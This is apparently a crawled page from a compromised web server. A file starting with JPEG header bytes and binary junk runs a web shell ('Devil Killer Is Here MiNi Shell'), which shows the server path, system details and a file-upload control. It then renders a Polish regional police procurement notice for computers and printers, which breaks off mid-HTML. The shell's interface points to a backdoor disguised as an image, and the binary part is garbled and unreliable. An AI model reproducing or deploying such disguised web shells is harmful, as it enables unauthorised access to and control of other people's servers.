JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210714/0011428201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00114282 z dnia 2021-07-14</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego w ramach I wyposażenia dla jednostek podległych KWP w Łodzi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 470754976</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lutomierska 108/112</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@ld.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://przetargi.lodzka.policja.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego w ramach I wyposażenia dla jednostek podległych KWP w Łodzi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d56ff626-e490-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00114282</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011261/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.27 Dostawa sprzętu komputerowego w ramach I Wyposażenia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_lodz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim.2. W postępowaniu cała komunikacja, między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej poprzez platformę zakupową -<br/>https://platformazakupowa.pl/pn/kwp_lodz dedykowaną dla niniejszego postępowania poprzez wykorzystanie przycisku: „wyślij wiadomość do Zamawiającego” na stronie Platformy zakupowej2. Zgodnie z art. 61 ust. 1 uPzp w postępowaniu komunikacja i wymiana informacji oraz oferty, dokumenty, oświadczenia, zapytania do treści SWZ, wyjaśnienia i inne informacje dotyczące<br/>postępowania składane są przez Wykonawcę wyłącznie za pośrednictwem platformy, na której prowadzone jest postępowanie.3. W sytuacji awarii platformy zakupowej Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zampub@ld.policja.gov.pl. Adres url.https://platformazakupowa.pl/pn/kwp_lodz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów, elektronicznych kopii dokumentów i oświadczeń oraz informacji przy użyciu środków komunikacji elektronicznej określają: Regulamin Internetowej Platformy Zakupowej ( dostępny pod adresem https://platformazakupowa.pl/strona/1-regulamin) oraz Instrukcja składania oferty dla Wykonawcy<br/>(dostępna pod adresem https://platformazakupowa.pl/strona/45-instrukcje). 2. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 104, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.3.Występuje limit objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów przy maksymalnej sumarycznej wielkości 500 MB. 4.Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.5.Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.6.W przypadku wykorzystania formatu<br/>podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.7.Maksymalny rozmiar jednego pliku przesyłanego<br/>za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.8.Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia<br/>Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (KRI), minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.9. Zamawiający zwraca uwagę<br/>na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi maksymalnie 5MB. podpis zaufany - https://www.biznes.gov.pl/pl/firma/sprawy-urzedowe/chce-zalatwic-sprawe-przez-internet/profilzaufanyi- podpis-zaufany podpis osobisty- https://www.gov.pl/web/e-dowod/podpis-osobisty</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z wymaganiami Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informuję Pana/Panią o tym, w jaki sposób Komendant Wojewódzki Policji w Łodzi przetwarza Pana/Pani dane osobowe:<br/>1.	Administratorem Danych Osobowych (ADO) jest Komendant Wojewódzki Policji w Łodzi <br/>z siedzibą przy ul. Lutomierskiej 108/112 w Łodzi, kod 91-048. <br/>2.	Dane kontaktowe Inspektora Ochrony Danych (IOD) – e-mail: iod@ld.policja.gov.pl<br/>3.	Dane osobowe, zwane dalej „danymi”, przetwarzane są w celu:<br/>a.	wykonania obowiązku prawnego ciążącego na Administratorze w zakresie realizacji postępowania o udzielenie zamówienia publicznego na dostawę sprzętu komputerowego w ramach I wyposażenia dla jednostek podległych KWP w Łodzi – FZ-2380/20/21/SS prowadzonym w trybie podstawowym bez negocjacji art. 275 pkt. 1 (podstawą przetwarzania jest art. 6 ust. 1 lit. c RODO). <br/>b.	w przypadku wyboru Pana/Pani oferty, w celu wykonania warunków umowy zawartej z Komendantem Wojewódzkim Policji bądź jego przedstawicielem prawnym lub podjęcie działań na Pana/Pani żądanie przed jej zawarciem. (podstawą przetwarzania jest art. 6 ust. 1 lit. b RODO)<br/>4.	Obowiązek podania przez Pana/Panią danych osobowych bezpośrednio Pana/Pani dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych. Konsekwencje niepodania określonych danych wynikają z ww. ustawy.<br/>5.	W związku z przetwarzaniem Pana/Pani danych osobowych, przysługuje Panu/Pani prawo do: <br/>a. dostępu do treści danych, na podstawie art. 15 RODO z zastrzeżeniem, że udostępniane dane osobowe nie mogą ujawniać informacji niejawnych, ani naruszać tajemnic prawnie chronionych, do których zachowania zobowiązany jest Komendant Wojewódzki Policji w Łodzi;<br/>b. sprostowania danych, na podstawie art. 16 RODO;<br/>c. ograniczenia przetwarzania danych, na podstawie art. 18 RODO - jeżeli kwestionuje Pan/Pani prawidłowość przetwarzanych danych, uważa, że są przetwarzane niezgodnie z prawem bądź sprzeciwia się ich przetwarzaniu, ale nie zgadza się na ich usunięcie;<br/>6.	W przypadku uznania, że przetwarzanie przez Komendanta Wojewódzkiego Policji w Łodzi Pana/Pani danych osobowych narusza przepisy RODO, przysługuje Panu/Pani prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.	<br/>7.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania - zgodnie z ustawą Prawo zamówień publicznych, oraz inne jednostki Policji w celu i zakresie koniecznym do realizacji umowy.<br/>8.	Pana/Pani dane osobowe będą przetwarzane w ramach dokumentacji prowadzonej w formie papierowej i elektronicznej na podstawie przepisów prawa dotyczących zamówień publicznych oraz archiwizacji, przez okres niezbędny do realizacji celów przetwarzania, tj. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a w przypadku wybrania Pani/Pana oferty i podpisania umowy, dane przechowywane będą przez okres obowiązywania umowy, a po tym czasie przez czas określony w przepisach ustawy o narodowym zasobie archiwalnym i archiwach. Sposób kwalifikowania spraw oraz czas ich przechowywania określa Jednolity Rzeczowy Wykaz Akt Policji stanowiący załącznik do Zarządzenia nr 93 Ministra Spraw Wewnętrznych i Administracji z dnia 17 grudnia 2007 roku.<br/>9.	Dane nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ-2380/20/21/SS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ramach I wyposażenia dla jednostek podległych KWP w Łodzi. <br/>Komputery stacjonarne- 53 szt.<br/>Monitory- 53 szt.<br/>Laptopy- 35 szt.<br/>2. Szczegółowy opis przedmiotu zamówienia ujęto w Załączniku nr 2 do SWZ. Szczegółowe warunki wykonywania zamówienia zawarte są we wzorze umowy, stanowiącym Załącznik nr 5 do SWZ (odpowiednio do zadania).<br/>3.Wykonawca zobowiązuje się realizować przedmiot zamówienia zgodnie z wymaganiami w odniesieniu do asortymentu wymienionego w poszczególnych pozycjach Formularza ofertowego, stanowiącego załącznik nr 1.1-1.3. do SWZ.<br/>4.	Wykonawca zobowiązuje się dostarczać towar na własny koszt i własnym transportem do KWP w Łodzi, ul. Lutomierska 108/112 (pomieszczenia w piwnicach).<br/>5.Przedmiot zamówienia obejmuje również wniesienie dostarczonego sprzętu do wskazanych przez upoważnionych pracowników Zamawiającego pomieszczeń.<br/>6.Przedmiot zamówienia musi być fabrycznie nowy, kompletny, wolny od wad. Musi spełniać wymogi Polskich Norm. Wykonawca zobowiązany będzie okazać na żądanie Zamawiającego aprobatę, atest lub certyfikat, o ile taki jest wymagany przez obowiązujące przepisy prawa.<br/>7.Przedmiot zamówienia zostanie przyjęty przez Zamawiającego w obecności Wykonawcy po sprawdzeniu ilościowym i jakościowym dostawy oraz zgodności dostawy ze Szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 2 do SWZ.<br/>8.Do dostarczonego sprzętu Wykonawca dostarczy karty gwarancyjne zawierające numer seryjny, termin i warunki ważności gwarancji, adresy i numery telefonów punktów serwisowych świadczących usługi gwarancyjne (dopuszcza się zastosowanie jednej gwarancji zbiorczej).<br/>9.Podane przez Zamawiającego w SWZ nazwy mają charakter przykładowy a ich wskazanie ma na celu określenie oczekiwanego standardu przy czym Zamawiający dopuszcza składanie ofert równoważnych na podstawie art. 99 ust. 5 ustawy. Nazwy lub symbolika podana została w celu prawidłowego określenia przedmiotu zamówienia. Przedstawiony opis stanowi minimum techniczne i jakościowe przedmiotu zamówienia oczekiwane przez Zamawiającego i będzie stanowił podstawę oceny ofert równoważnych.<br/>10.Zamawiający dopuszcza składanie ofert równoważnych, wskazując w opisie przedmiotu zamówienia kryteria stosowane w celu oceny równoważności. Zamawiający informuje, iż poprzez określenie: „oferowany produkt równoważny” rozumie, iż oferowany przedmiot zamówienia spełnia wymagania jakościowe, eksploatacyjne i techniczne równoważnie do produktów wskazanych przez Zamawiającego w opisie przedmiotu zamówienia. Oznacza to, że produkt równoważny musi spełniać parametry w stosunku do wymagań minimalnych wskazanych przez Zamawiającego w Opisie Przedmiotu zamówienia „wymagania minimalne” stanowiącym - Załącznik nr 2 do SWZ.<br/>11.Zamawiający zobowiązuje się do realizacji zamówienia na poziomie nie mniejszym niż 60% wartości umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213300-8 - Komputer biurkowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty niepodlegające odrzuceniu będą oceniane na podstawie kryterium:<br/>a.	cena oferty brutto /C/ – 60%<br/>b.	okres gwarancji on site- (G) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji on site</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa urządzeń drukujących i urządzeń drukujących wielofunkcyjnych formatu A4 w ramach I wyposażenia dla jednostek podległych KWP w Łodzi. <br/>Drukarka sieciowa A4 mono- 22 szt.<br/>Urządzenie wielofunkcyjne sieciowe A4 mono- 6 szt.<br/>2.	Szczegółowy opis przedmiotu zamówienia ujęto w Załączniku nr 2 do SWZ. Szczegółowe warunki wykonywania zamówienia zawarte są we wzorze umowy, stanowiącym Załącznik nr 5 do SWZ (odpowiednio do zadania).<br/>3.	Wykonawca zobowiązuje się realizować przedmiot zamówienia zgodnie z wymaganiami <br/>w odniesieniu do asortymentu wymienionego w poszczególnych pozycjach Formularza ofertowego, stanowiącego załącznik nr 1.1-1.3. do SWZ.<br/>4.	Wykonawca zobowiązuje się dostarczać towar na własny koszt i własnym transportem do KWP w Łodzi, ul. Lutomierska 108/112 (pomieszczenia w piwnicach).<br/>5.	Przedmiot zamówienia obejmuje również wniesienie dostarczonego sprzętu do wskazanych przez upoważnionych pracowników Zamawiającego pomieszczeń.<br/>6.	Przedmiot zamówienia musi być fabrycznie nowy, kompletny, wolny od wad. Musi spełniać wymogi Polskich Norm. Wykonawca zobowiązany będzie okazać na żądanie Zamawiającego aprobatę, atest lub certyfikat, o ile taki jest wymagany przez obowiązujące przepisy prawa.<br/>7.	Przedmiot zamówienia zostanie przyjęty przez Zamawiającego w obecności Wykonawcy po sprawdzeniu ilościowym i jakościowym dostawy oraz zgodności dostawy ze Szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 2 do SWZ.<br/>8.	Do dostarczonego sprzętu Wykonawca dostarczy karty gwarancyjne zawierające numer seryjny, termin i warunki ważności gwarancji, adresy i numery telefonów punktów serwisowych świadczących usługi gwarancyjne (dopuszcza się zastosowanie jednej gwarancji zbiorczej).<br/>9.	Podane przez Zamawiającego w SWZ nazwy mają charakter przykładowy a ich wskazanie ma na celu określenie oczekiwanego standardu przy czym Zamawiający dopuszcza składanie ofert równoważnych na podstawie art. 99 ust. 5 ustawy. Nazwy lub symbolika podana została w celu prawidłowego określenia przedmiotu zamówienia. Przedstawiony opis stanowi minimum techniczne i jakościowe przedmiotu zamówienia oczekiwane przez Zamawiającego i będzie stanowił podstawę oceny ofert równoważnych.<br/>10.	Zamawiający dopuszcza składanie ofert równoważnych, wskazując w opisie przedmiotu zamówienia kryteria stosowane w celu oceny równoważności. Zamawiający informuje, iż poprzez określenie: „oferowany produkt równoważny” rozumie, iż oferowany przedmiot zamówienia spełnia wymagania jakościowe, eksploatacyjne i techniczne równoważnie do produktów wskazanych przez Zamawiającego w opisie przedmiotu zamówienia. Oznacza to, że produkt równoważny musi spełniać parametry w stosunku do wymagań minimalnych wskazanych przez Zamawiającego w Opisie Przedmiotu zamówienia „wymagania minimalne” stanowiącym - Załącznik nr 2 do SWZ.<br/>11.	Zamawiający zobowiązuje się do realizacji zamówienia na poziomie nie mniejszym niż 60% wartości umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232110-8 - Drukarki laserowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty niepodlegające odrzuceniu będą oceniane na podstawie kryterium:<br/>a.	cena oferty brutto /C/ – 60%<br/>b.	okres gwarancji on site- (G) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 